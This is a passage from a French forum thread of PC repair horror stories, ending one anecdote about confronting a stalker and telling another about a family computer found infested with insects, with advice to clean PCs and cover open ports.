Du coup M.L. trouve l'adresse du stalker en demandant à des contacts communs, puis rejoint Nounours sur place, et par la suite il y a eu une histoire de dents cassées et d'excuses.

Conclusion: Ne stalkez pas les filles, c'est dangereux.

Epilogue: Nounours est sorti deux ans avec cette fille. Jamais compris comment il a fait pour ne pas la casser en deux. :kanako2:

Avatar du membre
Jaerdoster
Nico-Niconasse
Messages : 3042
Enregistré le : dim. avr. 18, 2010 1:16 am

Re: Les ordinateurs de l'HORREUR

Message par Jaerdoster »

Histoire 5: Satanas

Une histoire courte et rapide, dont je me suis souvenu et que je gardais pour demain, mais qui vous aidera à dormir cette nuit :lisbeth:

C'est en commençant a la réécrire que je me souviens pourquoi je l'avais oubliée. :kanako2:

Bref, retour dans le temps, je dépanne le PC de la famille d'un copain, qui se plaint que le PC chauffe, et qu'il sent un peu le grillé. Je suspecte l'horreur de la poussière de l'infini, voir du tabac (son père fume beaucoup). Si seulement...

Je leur demande un tournevis j'ouvre et là, TADAM
Image
Mais genre 10 fois ça, infesté à ras bord. J'ai fait un bond de trois mètres, j'ai proposé de bruler le tout, mais genre le père a fait "Ah ok.", est revenu avec l'aspirateur et a aspiré toute cette vermine.

Putain, plus jamais. J A M A I S :kanako2:

tl;dr nettoyez vos PC et vérifiez que vos grilles sont suffisantes. Elles avaient du entrer car un des caches de port PCI n'était pas en place.

Répondre